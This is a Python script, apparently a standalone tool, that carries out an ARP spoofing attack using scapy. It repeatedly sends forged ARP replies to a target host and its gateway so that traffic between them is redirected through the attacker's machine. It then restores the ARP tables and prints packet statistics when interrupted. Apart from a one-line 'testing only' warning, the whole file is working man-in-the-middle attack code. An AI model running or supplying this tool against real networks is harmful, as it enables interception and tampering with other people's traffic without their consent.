#!/usr/bin/env python3
"""
ARP Spoofer (Security Testing Tool)
Parameters:
    - IP: Target IP address
    - gateway: Gateway IP address
Requires: scapy package and admin/root privileges
Warning: Use for testing network security only
"""
from scapy.all import *
import argparse
import time
import sys
from threading import Thread, Event

class ARPSpoofer:
    def __init__(self, target_ip, gateway_ip):
        self.target_ip = target_ip
        self.gateway_ip = gateway_ip
        self.stop_event = Event()
        self.packets_sent = 0
        
    def get_mac(self, ip):
        """Get MAC address for an IP"""
        try:
            arp = ARP(pdst=ip)
            ether = Ether(dst="ff:ff:ff:ff:ff:ff")
            packet = ether/arp
            
            result = srp(packet, timeout=3, verbose=0)[0]
            return result[0][1].hwsrc
        except Exception as e:
            print(f"Error getting MAC address for {ip}: {str(e)}")
            return None
            
    def spoof(self, target_ip, spoof_ip):
        """Send ARP spoof packet"""
        try:
            target_mac = self.get_mac(target_ip)
            if not target_mac:
                return False
                
            packet = ARP(op=2, pdst=target_ip, hwdst=target_mac,
                        psrc=spoof_ip)
            send(packet, verbose=0)
            self.packets_sent += 1
            return True
            
        except Exception as e:
            print(f"Error sending spoof packet: {str(e)}")
            return False
            
    def restore(self, target_ip, source_ip):
        """Restore ARP tables"""
        try:
            target_mac = self.get_mac(target_ip)
            source_mac = self.get_mac(source_ip)
            if not target_mac or not source_mac:
                return
                
            packet = ARP(op=2, pdst=target_ip, hwdst=target_mac,
                        psrc=source_ip, hwsrc=source_mac)
            send(packet, count=5, verbose=0)
            print(f"Restored ARP tables for {target_ip}")
            
        except Exception as e:
            print(f"Error restoring ARP tables: {str(e)}")
            
    def progress_monitor(self):
        """Monitor and display progress"""
        start_time = time.time()
        last_packets = 0
        
        while not self.stop_event.is_set():
            time.sleep(1)
            packets_delta = self.packets_sent - last_packets
            elapsed_time = time.time() - start_time
            rate = self.packets_sent / elapsed_time if elapsed_time > 0 else 0
            
            print(f"\rPackets sent: {self.packets_sent}, "
                  f"Rate: {rate:.2f} packets/sec, "
                  f"Current: {packets_delta} packets/sec", end="")
            
            last_packets = self.packets_sent
            
    def start_spoof(self):
        """Start ARP spoofing attack"""
        print(f"Starting ARP spoofing attack:")
        print(f"Target: {self.target_ip}")
        print(f"Gateway: {self.gateway_ip}")
        print("Press Ctrl+C to stop and restore ARP tables...\n")
        
        # Verify MAC addresses
        target_mac = self.get_mac(self.target_ip)
        gateway_mac = self.get_mac(self.gateway_ip)
        
        if not target_mac or not gateway_mac:
            print("Could not get MAC addresses. Exiting...")
            return
            
        print(f"Target MAC: {target_mac}")
        print(f"Gateway MAC: {gateway_mac}\n")
        
        # Start progress monitor
        monitor = Thread(target=self.progress_monitor)
        monitor.start()
        
        try:
            while not self.stop_event.is_set():
                # Spoof target
                spoof_target = self.spoof(self.target_ip, self.gateway_ip)
                # Spoof gateway
                spoof_gateway = self.spoof(self.gateway_ip, self.target_ip)
                
                if not spoof_target or not spoof_gateway:
                    print("\nError during spoofing. Stopping...")
                    break
                    
                time.sleep(2)  # Wait before next round
                
        except KeyboardInterrupt:
            print("\nStopping ARP spoof...")
        finally:
            self.stop_event.set()
            monitor.join()
            
            # Restore ARP tables
            print("\nRestoring ARP tables...")
            self.restore(self.target_ip, self.gateway_ip)
            self.restore(self.gateway_ip, self.target_ip)
            
            # Print final statistics
            print("\nARP Spoofing Statistics:")
            print("-" * 40)
            print(f"Total packets sent: {self.packets_sent}")
            print(f"Target IP: {self.target_ip}")
            print(f"Gateway IP: {self.gateway_ip}")

if __name__ == "__main__":
    parser = argparse.ArgumentParser(
        description="ARP Spoofer (Security Testing Tool)")
    parser.add_argument("target", help="Target IP address")
    parser.add_argument("gateway", help="Gateway IP address")
    args = parser.parse_args()
    
    spoofer = ARPSpoofer(args.target, args.gateway)
    spoofer.start_spoof()
